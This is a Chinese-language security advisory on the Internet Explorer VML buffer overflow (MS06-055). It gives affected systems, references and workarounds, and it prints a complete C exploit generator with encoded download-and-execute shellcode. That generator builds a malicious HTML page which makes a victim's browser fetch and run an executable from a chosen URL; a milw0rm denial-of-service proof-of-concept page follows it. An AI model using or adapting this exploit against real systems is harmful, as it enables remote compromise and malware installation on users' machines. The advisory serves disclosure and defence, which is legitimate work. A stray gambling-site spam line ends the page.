首頁 -> 安全研究

安全研究

安全漏洞
Microsoft IE畸形VML文檔處理緩沖區溢出漏洞(MS06-055)

發布日期:2006-09-19
更新日期:2006-09-26

受影響系統:
Microsoft Internet Explorer 6.0 SP1
Microsoft Internet Explorer 5.0.1 SP4
Microsoft Windows XP SP2
Microsoft Windows XP SP1
Microsoft Windows XP Professional x64 Edition
Microsoft Windows Server 2003 x64 Edition
Microsoft Windows Server 2003 SP1
描述:
BUGTRAQ  ID: 20096
CVE(CAN) ID: CVE-2006-4868

Internet Explorer是微軟發布的非常流行的WEB瀏覽器。

Internet Explorer的VML組件存在緩沖區溢出漏洞,遠程攻擊者可能利用此漏洞在用戶機器上執行任意指令。

VML(Vector Markup Language)是一種基于XML的矢量圖形繪制語言。IE通過vgx.dll提供了對VML語言的支持,可以在解析頁面中嵌入的VML,顯示矢量圖。 vgx.dll的_IE5_SHADETYPE_TEXT::Text過程在解析VML的時候存在緩沖區溢出漏洞,利用這個漏洞可以完全控制用戶的系統。目前這個漏洞正在被積極的利用。

<*來源:Sunbelt Software (http://www.sunbelt-software.com/)
  
  鏈接:http://secunia.com/advisories/21989/
        http://www.microsoft.com/technet/security/advisory/925568.mspx
        http://marc.theaimsgroup.com/?l=bugtraq&m=115868614518870&w=2
        http://www.kb.cert.org/vuls/id/416092
        http://www.microsoft.com/technet/security/Bulletin/MS06-055.mspx
        http://www.us-cert.gov/cas/techalerts/TA06-262A.html
*>

測試方法:

警 告

以下程序(方法)可能帶有攻擊性,僅供安全研究與教學之用。使用者風險自負!

/*
*-----------------------------------------------------------------------
*
* vml.c - Internet Explorer VML Buffer Overflow Download Exec Exploit
* !!! 0day !!! Public Version !!!
*
* Copyright (C) 2006 XSec All Rights Reserved.
*
* Author : nop
* : nop#xsec.org
* : http://www.xsec.org
* :
* Tested : Windows 2000 Server CN
* : + Internet Explorer 6.0 SP1
* :
* Complie : cl vml.c
* :
* Usage : d:\>vml
* :
* : Usage: vml <URL> [htmlfile]
* :
* : d:\>vml http://xsec.org/xxx.exe xxx.htm
* :
*
*------------------------------------------------------------------------
*/

#include <stdio.h>
#include <stdlib.h>
#include <windows.h>

FILE *fp = NULL;
char *file = "xsec.htm";
char *url = NULL;

#define NOPSIZE 260
#define MAXURL 60

//DWORD ret = 0x7Ffa4512; // call esp for CN
DWORD ret = 0x7800CCDD; // call esp for All win2k

// Search Shellcode
unsigned char dc[] =
"\x8B\xDC\xBE\x6F\x6F\x6F\x70\x4E\xBF\x6F\x30\x30\x70\x4F\x43\x39"
"\x3B\x75\xFB\x4B\x80\x33\xEE\x39\x73\xFC\x75\xF7\xFF\xD3";

// Shellcode Start
unsigned char dcstart[] =
"noop";

// Download Exec Shellcode XOR with 0xee
unsigned char sc[] =
"\x07\x4B\xEE\xEE\xEE\xB1\x8A\x4F\xDE\xEE\xEE\xEE\x65\xAE\xE2\x65"
"\x9E\xF2\x43\x65\x86\xE6\x65\x19\x84\xEA\xB7\x06\xAB\xEE\xEE\xEE"
"\x0C\x17\x86\x81\x80\xEE\xEE\x86\x9B\x9C\x82\x83\xBA\x11\xF8\x7B"
"\x06\xDE\xEE\xEE\xEE\x6D\x02\xCE\x65\x32\x84\xCE\xBD\x11\xB8\xEA"
"\x29\xEA\xED\xB2\x8F\xC0\x8B\x29\xAA\xED\xEA\x96\x8B\xEE\xEE\xDD"
"\x2E\xBE\xBE\xBD\xB9\xBE\x11\xB8\xFE\x65\x32\xBE\xBD\x11\xB8\xE6"
"\x84\xEF\x11\xB8\xE2\xBF\xB8\x65\x9B\xD2\x65\x9A\xC0\x96\xED\x1B"
"\xB8\x65\x98\xCE\xED\x1B\xDD\x27\xA7\xAF\x43\xED\x2B\xDD\x35\xE1"
"\x50\xFE\xD4\x38\x9A\xE6\x2F\x25\xE3\xED\x34\xAE\x05\x1F\xD5\xF1"
"\x9B\x09\xB0\x65\xB0\xCA\xED\x33\x88\x65\xE2\xA5\x65\xB0\xF2\xED"
"\x33\x65\xEA\x65\xED\x2B\x45\xB0\xB7\x2D\x06\xB8\x11\x11\x11\x60"
"\xA0\xE0\x02\x2F\x97\x0B\x56\x76\x10\x64\xE0\x90\x36\x0C\x9D\xD8"
"\xF4\xC1\x9E";

// Shellcode End
unsigned char dcend[] =
"n00p";

// HTML Header
char * header =
"<html xmlns:v=\"urn:schemas-microsoft-com:vml\">\n"
"<head>\n"
"<title>XSec.org</title>\n"
"<style>\n"
"v\\:* { behavior: url(#default#VML); }\n"
"</style>\n"
"</head>\n"
"<body>\n"
"<v:rect style=\"width:20pt;height:20pt\" fillcolor=\"red\">\n"
"<v:fill method=\"";

char * footer =
"\"/>\n"
"</v:rect>\n"
"</body>\n"
"</html>\n"
;

// convert string to NCR
void convert2ncr(unsigned char * buf, int size)
{
int i=0;
unsigned int ncr = 0;

for(i=0; i<size; i+=2)
{
ncr = (buf[i+1] << 8) + buf[i];

fprintf(fp, "&#%d;", ncr);
}
}

void main(int argc, char **argv)
{
unsigned char buf[1024] = {0};
unsigned char burl[255] = {0};
int sc_len = 0;
int psize = 0;
int i = 0;

unsigned int nop = 0x4141;
DWORD jmp = 0xeb06eb06;

if (argc < 2)
{
printf("Windows VML Download Exec Exploit\n");
printf("Code by nop nop#xsec.org, Welcome to http://www.xsec.org\n");
//printf("!!! 0Day !!! Please Keep Private!!!\n");
printf("\r\nUsage: %s <URL> [htmlfile]\r\n\n", argv[0]);
exit(1);
}

url = argv[1];
if( (!strstr(url, "http://") && !strstr(url, "ftp://")) || strlen(url) <
10 || strlen(url) > MAXURL)
{
printf("[-] Invalid url. Must start with 'http://','ftp://' and < %d
bytes.\n", MAXURL);
return;
}

printf("[+] download url:%s\n", url);

if(argc >=3) file = argv[2];

printf("[+] exploit file:%s\n", file);

fp = fopen(file, "w+b");
//fp = fopen(file, "w");
if(!fp)
{
printf("[-] Open file error!\n");
return;
}

// print html header
fprintf(fp, "%s", header);
fflush(fp);

for(i=0; i<NOPSIZE; i++)
{
//fprintf(fp, "&#%d;", nop);
fprintf(fp, "A");
}

fflush(fp);

// print shellcode
memset(buf, 0x90, sizeof(buf));
//memset(buf, 0x90, NOPSIZE*2);

memcpy(buf, &ret, 4);
psize = 4+8+0x10;

memcpy(buf+psize, dc, sizeof(dc)-1);
psize += sizeof(dc)-1;

memcpy(buf+psize, dcstart, 4);
psize += 4;

sc_len = sizeof(sc)-1;
memcpy(buf+psize, sc, sc_len);
psize += sc_len;


// print URL
memset(burl, 0, sizeof(burl));
strncpy(burl, url, 60);

for(i=0; i<strlen(url)+1; i++)
{
burl[i] = buf[i] ^ 0xee;
}

memcpy(buf+psize, burl, strlen(url)+1);
psize += strlen(url)+1;

memcpy(buf+psize, dcend, 4);
psize += 4;


// print NCR
convert2ncr(buf, psize);



printf("[+] buff size %d bytes\n", psize);

// print html footer
fprintf(fp, "%s", footer);
fflush(fp);

printf("[+] exploit write to %s success!\n", file);
}

=============================================================================

<!--
Currently just a DoS

EAX is controllable and currently it crashes when trying to move EBX into the location pointed to by EAX

Shirkdog
-->

<html xmlns:v="urn:schemas-microsoft-com:vml">

<head>
<object id="VMLRender" classid="CLSID:10072CEC-8CC1-11D1-986E-00A0C955B42E">
</object>
<style>
v\:* { behavior: url(#VMLRender); }
</style>
</head>

<body>


<v:rect style='width:120pt;height:80pt' fillcolor="red">
<v:fill method="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAABCD01" angle="-45"
focus="100%" focusposition=".5,.5" focussize="0,0"
type="gradientRadial" />
</v:rect>

</body>
</html>

# milw0rm.com [2006-09-19]

建議:
臨時解決方法:

* 解除vgx.dll的注冊
  點擊“開始”菜單,選擇“運行”,在其中輸入下面的命令:
  regsvr32 -u "%ProgramFiles%\Common Files\Microsoft Shared\VGX\vgx.dll"
  然后點擊“確定”,在隨后出現的彈出窗口中點擊“確定”按鈕。
  在微軟發布補丁后,如果想恢復注冊,只需再用上述方法運行下面的命令即可:
  regsvr32 "%ProgramFiles%\Common Files\Microsoft Shared\VGX\vgx.dll"
* 修改訪問控制列表,限制用戶對vgx.dll訪問
* 配置Microsoft Windows XP SP2上的IE6在Internet和本地Intranet安全區中禁用“二進制和腳本行為”
* 以純文本方式讀取郵件消息

廠商補?。?br />
Microsoft
---------
Microsoft已經為此發布了一個安全公告(MS06-055)以及相應補丁:
MS06-055:Vulnerability in Vector Markup Language Could Allow Remote Code Execution (925486)
鏈接:http://www.microsoft.com/technet/security/Bulletin/MS06-055.mspx

瀏覽次數:18566
嚴重程度:10(網友投票)
本安全漏洞由綠盟科技翻譯整理,版權所有,未經許可,不得轉載
綠盟科技給您安全的保障
彩票网站哪个最正规